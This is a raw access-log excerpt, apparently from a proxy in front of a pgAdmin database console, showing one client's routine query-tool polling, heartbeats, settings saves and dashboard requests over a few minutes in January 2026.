"https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:11:58:15 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:58:17 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:11:58:17 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:58:18 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:58:18 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:11:58:19 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:11:58:20 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:11:58:20 +0000] - 500 500 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 384] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:11:58:20 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:11:58:20 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:58:21 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:11:58:23 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:11:58:25 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:11:58:25 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:58:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:58:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:58:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:58:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:58:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:58:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:58:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:59:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:59:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:59:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:59:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:59:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:59:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:59:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:11:59:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:00:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:00:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:01:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:01:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:01:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:02:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:02:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:03:03 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:03:05 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:03:05 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:05 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:03:07 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:11 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:03:13 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:15 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:15 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:15 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:03:17 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:19 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:20 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:20 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:03:21 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:21 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:21 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:22 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:23 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:25 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:25 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:03:27 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:29 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:29 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:30 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:30 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:30 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:03:31 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:32 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:33 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:34 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:35 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:35 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] 